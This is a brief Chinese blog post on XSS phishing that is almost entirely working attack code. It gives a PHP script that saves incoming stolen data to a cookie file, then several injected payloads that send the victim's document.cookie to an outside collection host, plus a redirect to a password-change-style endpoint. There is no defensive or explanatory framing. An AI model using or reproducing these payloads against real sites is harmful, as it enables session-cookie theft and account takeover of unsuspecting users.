xss钓鱼篇

网站接受代码

    <?php
    $content = $_GET['a'];
    if(isset($content))
    {
    	file_put_contents('tmp/cookie.txt',$content);
    }else{
    	echo 'no date input';
    }
    ?>

构造钓鱼代码

    <script>document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie</script>

    <body onload = "document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie"></body>

    <script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>

posted @ 2022-01-18 16:57 LinkPoc 阅读(110) 评论(0) 收藏举报

刷新页面返回顶部

Linkpoc

xss钓鱼篇

公告